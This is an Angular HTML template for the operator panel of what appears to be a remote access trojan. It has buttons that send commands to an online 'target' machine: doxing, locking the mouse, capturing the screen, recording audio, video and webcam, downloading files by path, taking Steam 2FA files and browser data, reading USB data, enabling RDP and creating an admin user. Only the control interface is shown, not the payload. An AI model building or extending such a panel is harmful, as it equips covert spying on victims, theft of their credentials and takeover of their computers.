<div class="commandBtns">
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('dox', target$.identifier)">Dox</button>
  </div>
  <div>
    <form [formGroup]="mouseForm">
      <button mat-button [disabled]="!target$.online || !mouseForm.valid" color="accent"
        (click)="wrocsidHandler('mouse', target$.identifier, concatTime(mouseForm))">Mouse Lock</button>
      <mat-form-field appearance="fill" class="timeInput">
        <mat-label>Time amount</mat-label>
        <input matInput required type="number" min="1" #timeAmount formControlName="timeAmount">
        <mat-error *ngIf="mouseForm.get('timeAmount')?.invalid">Not a valid number...</mat-error>
      </mat-form-field>
      <mat-form-field appearance="fill" class="timeInput">
        <mat-label>Time units</mat-label>
        <select matNativeControl required [attr.disabled]="!target$.online" #timeUnits formControlName="timeUnits">
          <option value="s">Seconds</option>
          <option value="m">Minutes</option>
          <option value="h">Hours</option>
        </select>
      </mat-form-field>
    </form>
  </div>
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('screen', target$.identifier)">Screen</button>
  </div>
  <div>
    <form [formGroup]="downloadForm">
      <button mat-button [disabled]="!target$.online || !downloadForm.valid" color="accent"
        (click)="wrocsidHandler('download', target$.identifier, getPath(downloadForm))">Download</button>
      <mat-form-field appearance="fill" class="timeInput">
        <mat-label>Path</mat-label>
        <input matInput required formControlName="path" #path>
        <mat-error *ngIf="downloadForm.get('path')?.invalid">Not a valid path...</mat-error>
      </mat-form-field>
    </form>
  </div>
  <div>
    <form [formGroup]="recordForm">
      <button mat-button [disabled]="!target$.online || !recordForm.valid" color="accent"
        (click)="wrocsidHandler('record', target$.identifier, concatTime(recordForm))">Record</button>
      <mat-form-field appearance="fill" class="timeInput">
        <mat-label>Time amount</mat-label>
        <input matInput required type="number" min="1" #timeAmount formControlName="timeAmount">
        <mat-error *ngIf="recordForm.get('timeAmount')?.invalid">Not a valid number...</mat-error>
      </mat-form-field>
      <mat-form-field appearance="fill" class="timeInput">
        <mat-label>Time units</mat-label>
        <select matNativeControl required [attr.disabled]="!target$.online" #timeUnits formControlName="timeUnits">
          <option value="s">Seconds</option>
          <option value="m">Minutes</option>
          <option value="h">Hours</option>
        </select>
      </mat-form-field>
    </form>
  </div>
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('getSteam2fa', target$.identifier)">Get Steam 2FA Files</button>
  </div>
  <form [formGroup]="videoRecordForm">
    <button mat-button [disabled]="!target$.online || !videoRecordForm.valid" color="accent"
      (click)="wrocsidHandler('videoRecord', target$.identifier, concatTime(videoRecordForm))">Video Record</button>
    <mat-form-field appearance="fill" class="timeInput">
      <mat-label>Time amount</mat-label>
      <input matInput required type="number" min="1" #timeAmount formControlName="timeAmount">
      <mat-error *ngIf="videoRecordForm.get('timeAmount')?.invalid">Not a valid number...</mat-error>
    </mat-form-field>
    <mat-form-field appearance="fill" class="timeInput">
      <mat-label>Time units</mat-label>
      <select matNativeControl required [attr.disabled]="!target$.online" #timeUnits formControlName="timeUnits">
        <option value="s">Seconds</option>
        <option value="m">Minutes</option>
        <option value="h">Hours</option>
      </select>
    </mat-form-field>
  </form>
  <form [formGroup]="cameraRecordForm">
    <button mat-button [disabled]="!target$.online || !cameraRecordForm.valid" color="accent"
      (click)="wrocsidHandler('cameraRecord', target$.identifier, concatTime(cameraRecordForm))">Camera Record</button>
    <mat-form-field appearance="fill" class="timeInput">
      <mat-label>Time amount</mat-label>
      <input matInput required type="number" min="1" #timeAmount formControlName="timeAmount">
      <mat-error *ngIf="cameraRecordForm.get('timeAmount')?.invalid">Not a valid number...</mat-error>
    </mat-form-field>
    <mat-form-field appearance="fill" class="timeInput">
      <mat-label>Time units</mat-label>
      <select matNativeControl required [attr.disabled]="!target$.online" #timeUnits formControlName="timeUnits">
        <option value="s">Seconds</option>
        <option value="m">Minutes</option>
        <option value="h">Hours</option>
      </select>
    </mat-form-field>
  </form>
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('getBrowserData', target$.identifier)">Get Browser Data</button>
  </div>
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('getUSBData', target$.identifier)">Get USB Data</button>
  </div>
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('rdpEnable', target$.identifier)">Enable RDP</button>
  </div>
  <div>
    <button mat-button [disabled]="!target$.online" color="accent"
      (click)="wrocsidHandler('createAdminUser', target$.identifier)">Create Admin User</button>
  </div>
</div>
